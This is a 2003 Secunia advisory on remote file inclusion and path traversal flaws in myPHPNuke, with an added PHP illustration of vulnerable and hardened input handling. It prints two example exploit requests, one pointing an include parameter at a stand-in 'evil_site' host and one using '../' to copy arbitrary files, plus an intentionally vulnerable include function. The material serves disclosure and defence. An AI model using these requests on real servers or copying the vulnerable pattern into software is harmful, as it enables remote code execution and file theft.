[sec-adv] myPHPNuke Arbitrary File Inclusion Vulnerability

From: Secunia Security Advisories (sec-adv@secunia.com)
Date: Fri Sep 12 2003 - 08:30:02 CDT


TITLE:
myPHPNuke Arbitrary File Inclusion Vulnerability

SECUNIA ADVISORY ID:
SA9721

VERIFY ADVISORY:
http://www.secunia.com/advisories/9721/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
myPHPNuke 1.x

DESCRIPTION:
Multiple vulnerabilities have been identified in myPHPNuke allowing
malicious people to include and execute arbitrary code.

One problem is that the script "Gallery/displayCategory.php" doesn't
verify the "basepath" and "adminpath" parameters before using them.
This allows malicious people to include arbitrary files from remote
servers.

Example:
Gallery/displayCategory.php?basepath=http://evil_site

The other problem is that the mail attach function doesn't verify
file names properly. This allows malicious users to include arbitrary
remote and local files.

Example (copies "path_to/any_file" into "mail_me.txt" and attaches
it):
mailattach.php?submit=1&attach1=path_to/any_file&attach1_name=../mail_me.txt

The vulnerabilities have been reported in version 1.8.8_7.

SOLUTION:
Edit the source code so that user input is properly verified before
being used.
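Added illustration (not taken from the advisory or from the myPHPNuke code base) of the verification the SOLUTION section calls for: the include path is resolved from a server-side constant instead of the "basepath" request parameter, and the attachment name is stripped of directory components and checked before the file is copied. The function names, the config file name and the upload directory are assumptions for the example.

```php
<?php
// Hypothetical code showing the two bug classes from the advisory next to a
// hardened form. Names and paths are assumptions, not myPHPNuke's own code.

// --- Bug class 1: include path taken from the request -----------------------
// Vulnerable pattern (do not use): whatever arrives in "basepath", including a
// remote URL, is included and executed by PHP.
function vulnerable_include(array $get): void {
    $basepath = $get['basepath'];             // attacker-controlled
    include $basepath . '/gallery_config.php';
}

// Hardened: never build an include path from user input. The location comes
// from a constant set at install time and the request parameter is ignored.
define('GALLERY_BASEPATH', __DIR__);          // assumed install location
function safe_include(): void {
    include GALLERY_BASEPATH . '/gallery_config.php';
}

// --- Bug class 2: attachment file name taken from the request ---------------
// Returns the validated file name, or null when the input is rejected.
function validate_attachment_name(string $name): ?string {
    // basename() drops every directory component, so "../mail_me.txt"
    // becomes "mail_me.txt" and cannot escape the attachment directory.
    $base = basename($name);
    // Accept only a conservative character set and a bounded length.
    if ($base === '' || strlen($base) > 64
        || !preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]*$/', $base)) {
        return null;
    }
    return $base;
}

// Hardened copy: the source must already live inside the upload directory,
// and the destination name is the validated one, so "attach1" can no longer
// point at an arbitrary local file and "attach1_name" cannot traverse.
function copy_attachment(string $uploadDir, string $src, string $name): bool {
    $real = realpath($src);
    $dir  = realpath($uploadDir);
    if ($real === false || $dir === false
        || strncmp($real, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return false;                         // source outside upload dir
    }
    $safe = validate_attachment_name($name);
    if ($safe === null) {
        return false;                         // name rejected
    }
    return copy($real, $dir . DIRECTORY_SEPARATOR . $safe);
}
```

As defence in depth, disabling allow_url_fopen in php.ini (and allow_url_include on PHP versions that have it) stops include() from fetching remote URLs even if a path check is missed.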

REPORTED BY / CREDITS:
frog-mn

ORIGINAL ADVISORY:
http://www.phpsecure.info/v2/tutos/myPHPNuke.txt

----------------------------------------------------------------------

Secunia recommends that you verify all advisories you receive, by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.

Contact details:
Web : http://www.secunia.com/
E-mail : support@secunia.com
Tel : +45 7020 5144
Fax : +45 7020 5145

----------------------------------------------------------------------
